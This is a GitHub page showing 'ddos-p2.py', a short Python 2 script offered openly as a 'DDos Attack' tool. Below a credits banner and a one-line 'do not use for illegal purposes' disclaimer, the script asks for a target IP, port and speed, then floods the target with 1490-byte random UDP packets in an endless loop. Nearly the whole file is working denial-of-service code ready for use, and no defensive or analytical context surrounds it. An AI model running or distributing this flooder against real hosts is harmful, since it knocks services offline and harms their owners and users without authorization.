-
Notifications
You must be signed in to change notification settings - Fork 43
/
ddos-p2.py
46 lines (40 loc) · 1.13 KB
/
ddos-p2.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
# python2
import sys
import os
import time
import socket
import random
#Code Time
from datetime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year
##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
#############
os.system("clear")
os.system("figlet DDos Attack")
print " "
print "/---------------------------------------------------\ "
print "| Author : Andysun06 |"
print "| Author github : https://github.com/Andysun06 |"
print "| Kali-QQ learning group : 909533854 |"
print "| Edition : V1.0.0 |"
print "\---------------------------------------------------/"
print " "
print " ---------[Do not use for illegal purposes]--------- "
print " "
ip = raw_input("Input IP : ")
port = int(input("Attack port : "))
sd = int(input("Attack speed(1~1000) : "))
os.system("clear")
sent = 0
while True:
sock.sendto(bytes, (ip,port))
sent = sent + 1
print "Sent %s packet to %s throught port:%d"%(sent,ip,port)
time.sleep((1000-sd)/2000)